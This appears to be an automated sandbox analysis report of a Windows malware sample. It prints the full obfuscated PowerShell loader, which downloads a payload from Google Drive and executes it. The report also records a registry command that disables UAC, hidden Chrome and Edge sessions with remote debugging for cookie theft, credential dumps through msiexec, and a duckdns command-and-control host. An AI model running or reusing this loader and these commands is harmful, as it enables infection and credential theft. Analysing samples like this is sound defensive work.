"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? 
skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE 
cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. 
beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9d9b9cc40,0x7ff9d9b9cc4c,0x7ff9d9b9cc58
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mjefag"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oljybzwmk"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yfpqbrgoycnn"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2308 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3676 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6851297213770189170,10307642119208422506,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d9a546f8,0x7ff9d9a54708,0x7ff9d9a54718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13hindi4pistatukoy4tra.duckdns.org | udp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 154.216.18.79:47392 | 13hindi4pistatukoy4tra.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 79.18.216.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.187.234:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4528-4-0x00007FF9D9553000-0x00007FF9D9555000-memory.dmp
memory/4528-5-0x0000026BEA090000-0x0000026BEA0B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjxnantl.iq5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4528-15-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-16-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-19-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-20-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/4528-23-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp
memory/1468-24-0x0000000002B50000-0x0000000002B86000-memory.dmp
memory/1468-25-0x0000000005520000-0x0000000005B48000-memory.dmp
memory/1468-26-0x0000000005BB0000-0x0000000005BD2000-memory.dmp
memory/1468-27-0x0000000005C50000-0x0000000005CB6000-memory.dmp
memory/1468-28-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/1468-38-0x0000000005DF0000-0x0000000006144000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f58e73a5c43b0713d39bb6cca4251670 |
| SHA1 | ece141754053a0d3855b7270a9569601e99dbbf6 |
| SHA256 | f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015 |
| SHA512 | 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8 |
memory/1468-40-0x0000000006440000-0x000000000645E000-memory.dmp
memory/1468-41-0x0000000006460000-0x00000000064AC000-memory.dmp
memory/1468-42-0x0000000007C20000-0x000000000829A000-memory.dmp
memory/1468-43-0x00000000075A0000-0x00000000075BA000-memory.dmp
memory/1468-44-0x0000000007690000-0x0000000007726000-memory.dmp
memory/1468-45-0x0000000007640000-0x0000000007662000-memory.dmp
memory/1468-46-0x0000000008850000-0x0000000008DF4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Overballast.Van
| MD5 | d7b88800546dce0f4e1f1df0c00bbd38 |
| SHA1 | e36f1565ded075365e68dd93ae93b63b24882325 |
| SHA256 | 29bec0378c0caadfb30794b545b50f3498631248f06dbfce7d4ae233737a5535 |
| SHA512 | 173192d430f26a32a4a52d0d9be716cbc75ed6dd5d22b8eb53ba6553d683c700115f48897d330f97f687a35287c9a943bed2299f26357d980568ede8708a3feb |
memory/1468-48-0x0000000008E00000-0x000000000C9DA000-memory.dmp
memory/2400-62-0x0000000000A00000-0x0000000001C54000-memory.dmp
memory/2400-63-0x0000000000A00000-0x0000000001C54000-memory.dmp
memory/2400-69-0x00000000214E0000-0x0000000021514000-memory.dmp
memory/2400-73-0x00000000214E0000-0x0000000021514000-memory.dmp
memory/2400-72-0x00000000214E0000-0x0000000021514000-memory.dmp
memory/2424-79-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State
| MD5 | 8d8dcad3d6137a36506f5aaf6e19b4ce |
| SHA1 | dd97f59dc37f5c1f853a0a6d5acde8742f3d63e5 |
| SHA256 | c809f4286da7aedf166b2acc34f6101f3095dbfe2453620592db0948b18110cc |
| SHA512 | d150fa593bf1f8f27cff617251d7a90a91ddb16efdf5c3f1c093e80d5249aa1953b33ef9ced7552fe7ea00437297c02217eaa95990e7bb4a66e9f3d715b4b5b7 |
memory/2424-83-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2424-81-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4448-85-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2424-88-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3764-93-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3764-89-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4448-87-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3764-86-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4448-84-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | ebc04efe08c5b479d966dcc4098ad9fd |
| SHA1 | 982c038afc8f5c796145ad9f244dd630ed49ed85 |
| SHA256 | 0cff7fb1fa385668dd0006c0ae569a42ade53e94f948aef3092a176482374144 |
| SHA512 | a8d8f13c25f0c8c3e2576043c84aa4224a188483dcef98d8edb9bc0c83d4232e74e444aba2565a7c76192fc3ad71de2ed4c6b9ec68426f16eee788d065bf143b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies
| MD5 | 6f27555cbe1a0d786558e04566b4bd53 |
| SHA1 | b3790bb9baebbb92d6bd2bfb02fbc8a6b68af0dc |
| SHA256 | bb549aab3a1d4cce89d5fb044da67fd592a287bc9d7ad47ac37dd79c89a4fb1d |
| SHA512 | 03a620524476d336e391e56bed9cf060588bd7421ccc7fe07dfd328748c8587f04be8f8db56587a237df9f483e9c85f4455f9f1483595b8c8289dcdae1838a2a |
\??\pipe\crashpad_2548_TTDXIHQAUTMNNLZD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
